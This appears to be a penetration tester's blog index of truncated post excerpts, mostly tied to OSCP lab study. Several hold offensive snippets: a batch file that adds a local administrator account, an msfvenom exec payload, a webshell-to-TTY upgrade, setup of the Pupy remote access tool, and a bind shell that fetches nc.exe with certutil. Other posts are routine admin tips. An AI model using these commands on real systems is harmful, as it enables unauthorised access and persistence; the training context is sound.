Add user to windows using perl

Running a Windows System Command using Perl

#!/usr/bin/perl
system("start C:\\admin\\adduser.bat");

Contents of c:\admin\adduser.bat:

net user kali kali1234 /add
net localgroup Administrators kali /add
. . .

msfvenom x64 add user failing

My MSFVenom x64 Windows 10 Nightmare

I spent about an hour on this, so I'll save you some time. I tried to compile a 64-bit executable using msfvenom that would add a user as an administrator to a Windows 10 x64 machine (version 1809).

Commands Tried

msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user . . .

Howto Install the Pupy Post Exploitation Kit on Kali Linux

Overview

Pupy is a Remote Access/Post Exploitation tool.

Here are some of my favorite features:

All-in-memory execution
A Windows payload that can load the entire Python interpreter from memory using a reflective DLL
Execute non-interactive commands on multiple hosts at once
Reflectively migrate into other processes
Interactive shells (cmd.exe, /bin/bash, etc.) can be opened . . .

List all Public IP Addresses Across All of your AWS Accounts

Gathering all EC2 Public IPs

Recently I needed to automate pulling all public IP addresses across all of the EC2 accounts I have access to. I wrote the following script to deal with that problem.

Note: Thank you to Daniel Miessler for the script to pull the IPs. My script makes that work across . . .

Upgrade dummy terminal to tty

If you have ever gotten a webshell and wanted an interactive terminal, this post is for you!

With Python:

python -c 'import pty;pty.spawn("/bin/bash")'

Without Python:

script -qc /bin/bash /dev/null

Then, inside the nc session:

CTRL+Z
stty raw -echo; fg; ls
export TERM=xterm-256color
export SHELL=bash

Creating a Windows Bind Shell Using C

I'm studying for the OSCP and needed to replace the .exe file of a Windows service with a new .exe file. On reboot, my goal is to have a shell as NT Authority\System.

Source Code

Filename: winshell.c

This file will:

Using the native "certutil.exe", download nc.exe.txt from the . . .

Ingesting Okta logs into Graylog

After many failed attempts to import Okta logs into Graylog (using some PowerShell scripts I found online), I decided to take a different approach. Here is what my final dashboard and view ended up looking like:

Prerequisites

To ingest Okta logs into Graylog you will need the following:

. . .

Disable Screen Lock on Kali Linux 2020

Problem

Kali Linux keeps locking the screen when it is not used for a short period of time.

Solution

You need to configure “Light Locker” to stop automatically locking the session.

Steps

Click the icon at the top left of the screen (Kali Linux logo)
From the popup menu, click "Settings"
From the next popup menu, click . . .

How to scan top 100 ports with masscan

If you have ever wanted to scan the top 100 ports with masscan here are the instructions:

masscan -p7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157 10.11.1.0/24 --rate=1000 -e tun0 --router-ip 10.11.0.1

You will need to replace the following:

tun0 with your interface
--router-ip with the router of the subnet you are scanning
10.11.1.0/24 with the subnet you are scanning

I obtain . . .

Parse fully qualified domain names from file

I ran into a situation where I needed to parse all fully qualified domain names (FQDNs) from a bunch of files in the same directory.

Here is how to do that:

grep -R -h -Eo '(http|https)://[^/"]+' . | awk -F'/' '{ print $3 }' | sort | uniq